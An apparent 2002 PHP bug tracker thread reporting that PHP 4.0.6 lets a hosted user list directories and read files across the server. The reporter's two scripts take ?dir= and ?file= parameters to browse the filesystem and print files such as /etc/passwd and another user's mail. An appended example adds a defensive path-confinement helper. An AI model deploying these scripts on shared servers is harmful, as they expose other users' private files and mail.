ID: 15185
Updated by: daniel
Reported By: [EMAIL PROTECTED]
Old Status: Bogus
Status: Open
Bug Type: *Directory/Filesystem functions
Operating System: Slackware
PHP Version: 4.0.6
New Comment:

Actually this is a dupe of MY bug report. PHP has a bug with readdir(). safe_mode does not limit readdir:

http://bugs.php.net/bug.php?id=15018&edit=1

Someone bogusified it. Wasn't me. And yes, I tested it on 4.1.0.

Kind Regards,
Daniel Lorch

Previous Comments:
------------------------------------------------------------------------

[2002-01-23 14:54:45] [EMAIL PROTECTED]

Not a PHP issue.

PHP runs with the same permissions as the user the webserver runs under, so if this user has permission to see the whole server filesystem, PHP will have that, too.

Run your webserver as a low-privileged user and give it read permission to the absolute minimum of the filesystem, or have a look at http://www.php.net/manual/en/features.safe-mode.php

------------------------------------------------------------------------

[2002-01-23 14:26:36] [EMAIL PROTECTED]

I've found a possible bug in PHP 4.06. Using the simple function readdir(), I could explore about 90% of the server, including /var/spool/mail, /etc/passwd, etc. I've written a simple script that lets me move through all directories:

<?
// $dir comes straight from the query string (?dir=...); this relies on
// register_globals, which is on by default in PHP 4.0.x.
if ($dir == "") { $dir = "."; }

function getDirList ($dirName)
{
    print("<h1>Index of: $dirName</h1><hr>");
    $dirs = array();
    $files = array();
    $dirfiles = array();
    $dirn = 0;
    $filen = 0;

    $d = dir($dirName);
    // Compare against false so an entry named "0" does not end the loop.
    while (false !== ($entry = $d->read())) {
        if ($entry != "." && $entry != "..") {
            if (is_dir($dirName."/".$entry)) {
                array_push($dirs, "$dirName/$entry");
                $dirn++;
            } else {
                array_push($files, "$entry");
                array_push($dirfiles, "$dirName");
                $filen++;
            }
        }
    }
    $d->close();

    // Sub-directories link back to this script with a new ?dir= value.
    $tmp = 0;
    while ($tmp < $dirn) {
        print("<a href='?dir=$dirs[$tmp]'>$dirs[$tmp]</a><br>");
        $tmp++;
    }

    $tmp = 0;
    while ($tmp < $filen) {
        print("<a href='?dir=$dirfiles[$tmp]'>$dirfiles[$tmp]</a>/<a href='$dirfiles[$tmp]/$files[$tmp]'>$files[$tmp]</a><br>");
        $tmp++;
    }

    if ($dirName != ".") {
        print("<hr><button OnClick='javascript:history.back();'>Back</button>");
    }
}

getDirList("$dir");
?>

The default directory is '.' (your home directory), but if you load this page with the parameter dir=/ (e.g. http://your.host/dir.php?dir=/ ) you will probably access the main folder on your Unix server. I wrote a second script that lets me read files that are not in my home directory:

<?
// $file comes straight from the query string (?file=...), again through
// register_globals.
function readtxt ($path)
{
    $Plik = fopen($path, "r");        // file handle
    flock($Plik, 1);                  // 1 = shared lock
    $rozm = filesize("$path");        // size in bytes
    $flaga = 0;                       // bytes read so far
    while ($flaga < $rozm) {
        $Linia = fgets($Plik, 2);     // length 2 reads one byte at a time
        print("$Linia");
        if ($Linia == "\n") { print("<br>"); }
        $flaga++;
    }
    flock($Plik, 3);                  // 3 = release lock
    fclose($Plik);
}

readtxt($file);
?>

By typing, for example, http://your.host/readtxt.php?file=/var/spool/mail/disco_dzik I could read disco_dzik's mail. Simple, but serious...

Neither script would move you outside your home directory if the server were two machines (the first one for the system, and the second one just for home directories) - it's obvious, but I've checked it ;)

P.S. The scripts were written for my use only, so some of the variables are named in Polish - sorry for that ;)

This is a serious bug that needs to be fixed!

------------------------------------------------------------------------
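
An application-side check for the `dir` and `file` parameters used by the scripts quoted in this thread, as an added example that is not part of the bug report or of PHP itself. It assumes PHP 7.1 or later; `confine_path()` and the demo directory are hypothetical names. It sits alongside the low-privileged web server user recommended in the 14:54:45 reply rather than replacing it.

```php
<?php
// Added example, not code from the bug report. confine_path() is a
// hypothetical helper; the inputs below are constructed sample values.

/**
 * Resolve $requested relative to $base. Returns the canonical path, or
 * null when it does not exist or resolves outside $base.
 */
function confine_path(string $base, string $requested): ?string
{
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return null;
    }
    // Always append to the base, so "/" or "/var/spool/mail" is never
    // taken as an absolute path the way dir($dir) and fopen($path) take it.
    $real = realpath($baseReal . DIRECTORY_SEPARATOR . $requested);
    if ($real === false) {
        return null;
    }
    // realpath() has already collapsed ".." and followed symlinks. Compare
    // with a trailing separator so /home/user2 does not match /home/user.
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($real !== $baseReal && strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// Constructed demo tree under the system temp directory.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'confine_demo_' . getmypid();
mkdir($base . DIRECTORY_SEPARATOR . 'sub', 0700, true);

// "." and "/" both resolve to the base itself; the rest either stay
// inside it or are rejected.
foreach (['.', 'sub', '/', '..', 'sub/../..', '/var/spool/mail'] as $input) {
    $path = confine_path($base, $input);
    printf("%-16s %s\n", $input, $path === null ? 'rejected' : $path);
}

rmdir($base . DIRECTORY_SEPARATOR . 'sub');
rmdir($base);
```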